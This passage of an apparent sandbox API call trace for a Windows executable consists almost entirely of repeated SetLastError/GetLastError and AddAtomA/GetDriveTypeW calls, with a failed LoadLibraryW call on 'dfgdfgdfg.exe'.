(dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError 
(dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError 
(dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.165] SetLastError (dwErrCode=0x0) [0108.165] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0108.165] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0108.165] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) 
returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) 
returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) 
returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) 
returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW 